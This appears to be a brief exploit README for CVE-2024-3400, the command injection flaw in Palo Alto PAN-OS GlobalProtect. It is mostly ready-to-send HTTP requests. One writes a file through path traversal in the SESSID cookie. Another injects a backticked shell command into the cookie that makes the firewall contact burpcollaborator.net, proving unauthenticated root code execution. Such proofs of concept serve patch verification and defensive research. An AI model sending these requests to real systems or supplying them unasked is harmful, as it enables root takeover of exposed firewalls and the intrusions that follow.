CVE-2024-3400

CVE-2024-3400 Palo Alto OS Command Injection

Vendor Description

A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.

Exploit

Kudos for watchtowr labs 🚀

Path traversal / Check

HTTP request:

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

poc.txt should be created under this path /var/appweb/sslvpndocs/global-protect/portal/images/poc.tx with root privilege.

If vulnerable you will recieve 403 when you access poc.txt instead of 404.

GET /global-protect/portal/images/poc.txt HTTP/1.1
Host: 127.0.0.1
Connection: close

RCE Check

Telemetry must be enabled.

You can use Burp Collaborator for rce check

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`hostname${IFS}burpcollaborator.net `;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

References

• https://security.paloaltonetworks.com/CVE-2024-3400
• https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
• https://github.com/h4x0r-dz/CVE-2024-3400